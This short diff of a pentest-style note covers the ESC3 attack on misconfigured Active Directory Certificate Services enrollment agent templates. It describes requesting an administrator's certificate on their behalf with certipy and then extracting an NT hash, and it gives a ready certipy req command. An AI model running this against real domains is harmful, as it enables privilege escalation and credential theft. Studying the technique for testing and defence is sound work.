ADCS - Privilege Escalation as a Service

 ESC3 - Misconfigured Enrollment Agent Templates

-To do this, first use certipy to request the regular enrollment agent certificate and, in the second step, e.g. a user certificate of an administrator.
-Then use certipy auth to request a Kerbero ticket and read the NTHash.
+To do this, use certipy to request the Enrollment Agent certificate as usual and in a second step e.g. B. a user certificate of an administrator.
+Then you request a Kerberos ticket with certipy auth and read out the NTHash.

 certipy req -u USER -p PASSWORD -ca CA_NAME -target IP/FQDN_CA -template ESC3.1 -on-behalf-of DOMAIN/ADMIN -pfx ESC3.pfx